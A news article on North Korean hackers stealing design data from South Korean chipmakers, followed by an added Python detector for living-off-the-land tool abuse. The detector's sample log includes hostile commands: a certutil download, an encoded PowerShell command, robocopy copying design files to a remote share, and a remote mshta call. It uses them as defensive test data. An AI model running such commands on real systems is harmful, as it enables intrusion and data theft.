The National Intelligence Service (NIS) in South Korea warns that North Korean hackers target domestic semiconductor manufacturers in cyber espionage attacks.
NIS says these attacks have increased from the second half of 2023 until recently, with the attackers targeting internet-exposed servers vulnerable to known flaws to gain initial access to corporate networks.
Once the network was breached, the threat actors stole data from servers holding sensitive documents and data.
In the cases observed by the NIS, the North Korean adversaries used “living off the land” tactics, which entails abusing legitimate software tools for malicious purposes to evade detection by security products.
The NIS mentions at least two cyberattacks on separate entities, occurring in December 2023 and February 2024, where the company’s configuration management and security policy servers were hacked.
This reportedly resulted in the compromise of product design drawings and facility site photos, among other sensitive data.
The two victims aren’t named in the report, but it is worth noting that South Korea is home to two leading chipmakers, Samsung Electronics and SK Hynix, which develop and produce a wide range of processors, system-on-chips, DRAM, and NAND flash products.
According to the US Department of Commerce, Samsung Electronics and SK Hynix are responsible for 73 percent of the global DRAM market share and 51 percent of the NAND flash market.
The two firms play critical roles in the global semiconductor supply chain, providing chips for a wide array of notable firms across various industries globally, including Apple, Google, Microsoft, Amazon, Sony, Dell, and many automotive and consumer electronics makers.
NIS reckons that these cyberattacks are aimed at collecting valuable technical information that the North Korean regime could use to develop its own chip-making program and cover military equipment needs.
The intel org says it notified the domestic victims of the cyberattacks and provided recommendations on detecting and stopping them.
An NIS official also highlighted the importance of applying security updates and strict access controls on internet-exposed servers, as well as consistently applying and updating robust authentication processes for administrators to prevent unauthorized access via hijacked privileged accounts.
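The “living off the land” tactic described above is rarely caught by file signatures, because the tools involved are legitimate; defenders instead look at how built-in binaries are invoked. The following is an added example, not code from the NIS report or from any of the companies mentioned: it scans process-creation log lines for a handful of well-known suspicious invocation patterns of built-in Windows tools. The `time|host|user|parent|cmdline` log format, the host names, the rule set and the sample lines themselves are all constructed for illustration and would need to be adapted to real telemetry such as Sysmon process events.

```python
"""Flag living-off-the-land (LOTL) tool usage in process-creation logs.

Added example for illustration; not from the NIS report. The log format,
hosts, addresses and detection heuristics below are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample log lines. Assumed format: "time|host|user|parent|cmdline".
# Hosts and the 203.0.113.x address (a documentation range) are made up.
SAMPLE_LOG = """\
2024-02-10T02:13:41Z|cfg-mgmt-01|svc_deploy|services.exe|C:\\Windows\\System32\\svchost.exe -k netsvcs
2024-02-10T02:14:05Z|cfg-mgmt-01|admin|cmd.exe|certutil.exe -urlcache -split -f http://203.0.113.7/update.dat C:\\Users\\Public\\u.dat
2024-02-10T02:14:12Z|cfg-mgmt-01|admin|cmd.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
2024-02-10T02:15:30Z|sec-policy-02|backup|schtasks.exe|robocopy.exe D:\\Designs \\\\203.0.113.7\\share /E /Z
2024-02-10T02:16:02Z|sec-policy-02|jdoe|explorer.exe|notepad.exe C:\\Users\\jdoe\\notes.txt
2024-02-10T02:16:44Z|sec-policy-02|admin|wmiprvse.exe|mshta.exe http://203.0.113.7/a.hta
"""


@dataclass
class Finding:
    host: str
    user: str
    rule: str
    cmdline: str


# Heuristics over the command line only. Each rule is a (name, regex) pair;
# these are common LOTL patterns, chosen here as assumptions, not a full ruleset.
RULES = [
    ("certutil download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I)),
    ("encoded powershell",
     re.compile(r"\bpowershell(\.exe)?\b.*\s-(e|enc|encodedcommand)\b", re.I)),
    ("robocopy to external share",
     re.compile(r"\brobocopy(\.exe)?\b.*\s\\\\(\d{1,3}\.){3}\d{1,3}\\", re.I)),
    ("mshta remote", re.compile(r"\bmshta(\.exe)?\b.*\bhttps?://", re.I)),
]


def parse_line(line: str) -> dict | None:
    """Split one log line into fields; return None for malformed lines."""
    fields = line.split("|", 4)
    if len(fields) != 5:
        return None
    ts, host, user, parent, cmdline = fields
    return {"ts": ts, "host": host, "user": user, "parent": parent, "cmdline": cmdline}


def scan(log_text: str) -> list[Finding]:
    """Return one Finding per (line, rule) match, in log order."""
    findings: list[Finding] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, pattern in RULES:
            if pattern.search(rec["cmdline"]):
                findings.append(Finding(rec["host"], rec["user"], name, rec["cmdline"]))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per host, a quick triage view of where to look first."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.host] = counts.get(f.host, 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"{f.host} {f.user}: [{f.rule}] {f.cmdline}")
    print(summarize(hits))
```

Note that ordinary administrative activity (`svchost.exe`, `notepad.exe`) produces no finding, while the four suspicious invocations are each attributed to a host and account; in practice the same approach is extended with parent-process and account-context conditions (for example an administrator account launching an encoded PowerShell command from a configuration-management server outside change windows), which is exactly the kind of context that signature-based scanning lacks.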